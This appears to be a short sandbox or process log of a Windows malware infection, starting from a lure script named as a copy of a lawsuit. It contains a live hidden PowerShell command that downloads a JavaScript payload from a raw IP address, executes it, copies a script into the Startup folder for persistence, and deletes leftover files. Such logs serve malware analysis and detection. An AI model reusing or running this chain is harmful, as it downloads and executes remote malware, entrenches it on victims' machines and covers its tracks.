wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Copia_de_la_demanda.wsf
2548powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://178.73.218.10/envio.js' -o C:\Windows\Temp\Подкрепа.js;explorer.exe C:\Windows\Temp\Подкрепа.js;Start-Sleep 3;[System.IO.File]::Copy('Подкрепа.wsf','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Подкрепа.wsf');Start-Sleep 1;rm *.pif,*.uue
2628explorer.exe "C:\Windows\system32\explorer.exe" C:\Windows\Temp\Подкрепа.js
2768